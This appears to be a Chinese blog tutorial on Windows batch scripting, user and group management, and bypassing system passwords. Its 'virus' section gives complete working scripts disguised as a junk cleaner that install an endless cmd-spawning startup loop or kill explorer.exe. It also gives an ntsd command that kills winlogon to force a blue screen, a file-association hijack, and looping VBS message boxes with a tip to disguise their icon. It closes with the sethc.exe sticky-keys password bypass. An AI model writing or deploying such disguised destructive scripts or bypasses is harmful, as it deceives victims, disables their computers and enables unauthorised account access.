批处理、用户与组管理、破解系统密码
初识批处理
- 如何批处理:
命名:.bat
方法:创建一个记事本文件,然后将其扩展改为.bat
- 批处理作用:自上而下成批处理每一条DOS命令,直到执行到最后一条。
- 运行环境:当然是我们cmd了
回归我学过的任何一门语言都是从一个简单的**程序开始的,批处理也同样如此
一个简单的批处理程序
1、引入
d: cd\ cd temp del ,/s/q
我们把几条dos命令汇聚在一起,这就进入了批处理的范畴
2、echo 输出
@echo off color 0a title 飞哥小程序v1.0 echo ========================== echo 菜单 echo 1、修改管理员密码 echo 2、定时关机 echo 3、退出本程序 echo =========================== pause
看不懂?先不急,我们先来看一下运行效果:
@echo off #关闭回显
color 0a #设置窗口显示颜色
color: 指定控制台输出的颜色属性 颜色属性由两个十六进制数字指定 -- 第一个为背景,第二个则为文字颜色。 每个数字可以为以下任何值之一: 0 = 黑色 8 = 灰色 1 = 蓝色 9 = 淡蓝色 2 = 绿色 A = 淡绿色 3 = 湖蓝色 B = 淡浅绿色 4 = 红色 C = 淡红色 5 = 紫色 D = 淡紫色 6 = 黄色 E = 淡黄色 7 = 白色 F = 亮白色 例如: "cilor fc" 亮白色背景,淡红色文字颜色。
title #设置程序名
例如:title 飞哥小程序v1.0
pause #暂停屏幕(没有这条语句,我们是看不到上图的显示效果的,程序只会一闪而过)
3、变量
-
@echo off color 0a title 飞哥小程序v1.0 echo ========================== echo 菜单 echo 1、修改管理员密码 echo 2、定时关机 echo 3、退出本程序 echo =========================== set /p u=请输入用户名: set /p p=请输入新密码: net user %u% %p% >nul pause
同样我们先来看下效果:
set /p u= ( 字符串 ) #获取输入的字符,将其赋值给变量u
%u% #提取变量u的值
net user 用户名 密码 #修改账户密码(windows所有平台支持)
>nul #清除一条命令执行后系统反馈
再来看一下效果:
后面的“命令成功完成”就不见了!
4、if、goto
-
@echo off color 0a title 飞哥小程序v1.0 :menu cls echo ========================== echo 菜单 echo 1、修改管理员密码 echo 2、定时关机 echo 3、退出本程序 echo =========================== set /p num=您的选择是: if "%num%"=="1" goto 1 if "%num%"=="2" goto 2 if "%num%"=="3" goto 3 echo 被闹,好好输! pause goto menu :1 set /p u=请输入用户名: set /p p=请输入新密码: net user %u% %p% >nul echo 您的密码已经设置成功! pause goto menu :2 set /p time=请输入时间: shutdown -s -t %time% set /p x=是否取消(1:是,0:否): if "%x%"=="1" shutdown -a goto menu pause :3 exit
分区块
:menu
"menu"区块
:1
“1”区块
:2
“2”区块
:3
"3"区块
goto 区块名 #程序跳该区块
例如:goto menu #程序跳至“menu区块”
if "%num%"=="1" 命令1 #如果条件成立,执行命令1;条件不成立,跳过命令1,向下走
cls #清屏
shutdown -s -t 100 #定时关机
-
常用shutdown命令:
shutdown -a #取消关机 shutdown -s #关机 shutdown -f #强行关闭应用程序 shutdown -l #注销当前用户 shutdown -r #关机并重启 shutdown -s -t 时间 #定时关机 shutdown -h #休眠 更多的 cmd: shutdown ? 查看
好了,通过我们以上所学的命令,这样一个简单的批处理程序就写完了。
病毒
测试环境:虚拟机win2003
注:一些简单的病毒程序请勿在真实机中测试
简单的批处理文件一
功能:伪装垃圾清理程序添加一个开机自启动项,无限弹出CMD窗口
@echo off title 系统垃圾清理 color 2f echo =======若杀毒软件恶意拦截,请选择【允许程序的所有操作】======== echo. echo. echo :start>c:\windows\windows.bat echo start cmd>>c:\windows\windows.bat echo goto start>>c:\windows\windows.bat copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul if %errorlevel%==0 goto next copy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动" >nul if %errorlevel%==1 goto error :next echo. echo. echo ====== 垃圾清理中,请不要关闭窗口====== echo. ping -n 5 127.0.0.1 >nul echo. echo ====== 垃圾清理完毕,共清理垃圾500M=== echo. echo. echo ====== 建议立即重启电脑 pause goto ex :error echo. echo. echo ====== 程序运行失败,请使用【管理员权限】重新运行!====== echo. pause goto ex :ex exit echo. #输出一个空
注:系统启动菜单位置这里是winxp和win2003的位置,至于win后续系统或其他系统,去问万能的度娘
我们来看一下运行效果:
运行完成后我们可以看到在开始启动项中多了一个windows.bat文件。
重启之后,电脑完全死机了。
简单的批处理文件二
功能:伪装垃圾清理程序强制终止桌面进程
@echo off title 系统垃圾清理 color 2f echo ====== 若有杀毒软件恶意拦截,请选择【允许程序的所有操作】===== echo. echo. :next echo. echo. echo ====== 垃圾清理中,请不要关闭窗口======= echo. ping -n 5 127.0.0.1 >nul taskkill /im explorer.exe /f >nul 2>nul echo. echo. ===== 完了,你系统废了====== ping -n 5 127.0.0.1>nul echo. start c:\windows\explorer.exe echo. echo ====== 已经修复好了!是不是吓坏了!!嘿嘿========= pause
>nul 2>nul 消息全部屏蔽
详细请访问:https://blog.csdn.net/weixin_43252204/article/details/105394751
桌面进程被杀死!
桌面进程恢复:
最简单的蓝屏炸弹文件
ntsd -c q -pn winlogon.ex分析:
ntsd #杀死进程
ntsd -c q -pn 进程名 #强制杀死进程
蓝屏原因:winlogon 进程不能被杀死,我想强制杀死,系统不让,结果导致蓝屏!
对win2003有很大的杀伤力,但对win2008基本没有杀伤力
最简单的病毒
assoc.exe=txtfile分析:
修改文件关联,导致文件无法正常打开
测试效果:
最简单的病毒解药
assoc.exe=exefile只需将文件后缀与其关联文对应即可
最简单的脚本
方法:将.txt改为.vbs
msgbox "我最帅!"测试效果:
最简单的死循环脚本
do msgbox "我最帅!" loop
测试:
效果:窗口无法关闭
解决方法:
vbs 使用微软自带的wscript.exe来编写的
一个有趣的小脚本,大家可以试试
do
msgbox "飞哥最帅!"
msgbox "小子,你对这件事有异议吗"
msgbox "你要为此付出代价"
msgbox "从现在开始我要求你点100下鼠标"
msgbox "100"
msgbox "99"
msgbox "98"
msgbox "97"
msgbox "96"
msgbox "95"
msgbox "94"
msgbox "93"
msgbox "92"
msgbox "91"
msgbox "90"
msgbox "...."
msgbox "3"
msgbox "2"
msgbox "1"
msgbox "如果你看到这里,说明你确实很执着,你感动了我,请再点一下"
msgbox "年轻人,有时候执着也没用,换个姿势再来一次"
loop
注:可以用修改图标软件修改vbs文件图标
整人网页
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>很恶心的常见整人效果的代码</title> <link rel="stylesheet" href=""> </head> <body> <a href="" onmouseover="alert('飞哥真帅'); alert('飞哥真帅'); alert('飞哥是真帅'); alert('飞哥是真帅'); alert('飞哥是真的帅'); alert('同意不!'); alert('不同意?'); alert('去死吧'); ">不许把鼠标移到这里!</a>点了真爽!!! </body> </html>
测试效果:
用户与组管理
windows服务器系统:win2000 win2003 win2008 win2012
linux服务器系统:Redhat Centos
用户管理
每个用户有自己的唯一的SID(安全标识符)
用户SID
系统SID
windows 系统管理员administrator的UID是 500
普通用户是1000 开始的
linux 系统管理员root 的UID是 0
普通用户是1000开始
账号密码存储的位置 :C:\windows\system32\config\SAM #暴力破解,撞库
windows系统上,默认密码最长有效期42天(尤其是服务器系统)
内置账户
给人使用的:
administrator 管理员账号
guest 来宾账户
计算机服务组件
system 系统账户,权限至高无上
local services 本地服务账户 普通权限
network services 网络服务账户 普通权限
配置文件
windows ”用户“
账户dos命令
-
net user
-
net user 账户名 字符串 #修改密码
-
net user 账户名 #查看账户信息
-
net user 账户名 密码 /add #新建账户
-
net user 账户名 密码 /del #删除账户
-
net user 账户名 /active:yes/no #激活或禁用账户
组管理
组的作用:简化权限赋予
赋权限方式:
1)用户 - 组-赋权限
2)用户-赋权限
内置组(系统自带组)
内置组的权限已经被系统赋予
-
administrators #管理员组
-
guests #来宾组
-
users #普通用户组
-
network #网络配置组
-
print #打印机组
-
Remote Desktop #远程桌面组
-
net localgroup
-
net localgroup 组名
-
net localgroup 组名 /add
-
net localgroup 组名 用户名 /add
-
net localgroup 组名 用户名 /del
-
net localgroup 组名 /del
服务器远程管理
图形化远程管理
运行 :“mstsc”
telnet(命令行)\
查看本地上所有开放的端口 cmd “netstat -an”
telnet:23
远程桌面协议RDP:3389
破解系统密码
利用5次shift漏洞破解win7密码
漏洞
漏洞1:未登陆系统前连按5次shift弹出程序c:\windows\system32\sethc.exe
漏洞2:部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名!
注:如果win7或win10已修补此漏洞2,则无法利用
破解过程相关知识
cmd工具路径
c:\windows\system32\cmd
用户/账户密码存储位置
c:\windows\system32\config\SAM
修改账户密码;
netuser 用户名 新密码
浙公网安备 33010602011771号